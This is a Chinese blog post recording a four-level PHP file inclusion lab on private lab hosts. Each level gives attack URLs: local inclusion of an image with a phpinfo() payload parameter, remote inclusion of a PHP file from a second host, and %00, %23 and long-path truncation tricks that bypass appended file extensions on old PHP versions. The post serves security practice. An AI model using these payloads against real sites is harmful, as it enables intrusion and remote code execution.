发布日期: 2019-09-22

文章字数: 557

阅读时长: 2 分

阅读次数:

第一关

源码

前面和后面都没有限制，则可以本地文件包含和远程文件包含（php需要开启）
远程文件包含需要设置 allow_url_fopen=On（默认开启） allow_url_include=Off（默认关闭，需要开启）

本地文件包含的方式：
http://192.168.100.220/action.php?action=news.jpg&pass=phpinfo();die();

远程文件包含
    采用在phpstudy上搭建服务器网站，浏览访问。
http://192.168.100.220/action.php?action=http://192.168.100.93/a.php

第二关

源码

文件包含时在文件前添加了路径，则不能使用远程文件包含的方式进行包含，只能使用本地文件包含的方式进行
http://192.168.100.220/action1.php?action=news.jpg&pass=phpinfo();die();

第三关

源码

在文件的后面添加文件后缀，则只能使用远程文件的方式进行绕过，如果服务器的操作系统是老版本，同时php版本<=5.3.17版本，的windows可以尝试截断的方式绕过

远程文件包含的方式
http://192.168.100.220/action2.php?action=http://192.168.100.93/a

远程文件截断
    ?
    %23
    %00  这个需要php版本小于 5.3.17
http://192.168.100.220/action2.php?action=http://192.168.100.93/a?&pass=phpinfo();die();

http://192.168.100.220/action2.php?action=http://192.168.100.93/a%23.php&pass=phpinfo();die();

第四关

源码

虽然存在文件包含漏洞，但因为 ./ 不能远程文件包含 .php 指定文件类型，如果想利用很难，只有尝试截断的方式去掉 .php 
http://192.168.100.220/action3.php?action=news.jpg%00&pass=phpinfo();die();

补充关于长文件名的截断

如果是前缀没有内容,php 5.2 后缀是可以截断的否则是不行的
php5.3开始就不能用了。

http://192.168.75.157/action/action3.php?action=news.jpg..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

http://192.168.75.157/action/action3.php?action=news.jpg/././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../././././././././././././././././././././././././././././

长文件截断：需要php <5.3，文件名前需要没有内容
路径如果是 ./ 的类型是不可以的 
    如果是 C：/var 或 inc/  的形式可以才

Php不以CGI模式运行

Phpstudy 是以模块的方式运行
Phpstudy_pro apache监听端口，php也监听端口，php以CGI模式运行

转载规则

《action的文件包含过关记录》由 Evolyutsiya 采用知识共享署名 4.0 国际许可协议进行许可。

action过关利用php伪协议文件包含

第一关源码尝试在news.php添加 ./ 观察是否有变化没有变化可能存在文件包含使用php伪协议查看文件 http://192.168.75.157/action/action.php?action=php://filter/re

2019-09-22 i春秋文件包含

文件包含第十周

upload-labs过关记录

文件上传练习

2019-09-22 i春秋文件上传

第九周文件上传

第一关

第二关

第三关

第四关

补充关于长文件名的截断

你的赏识是我前进的动力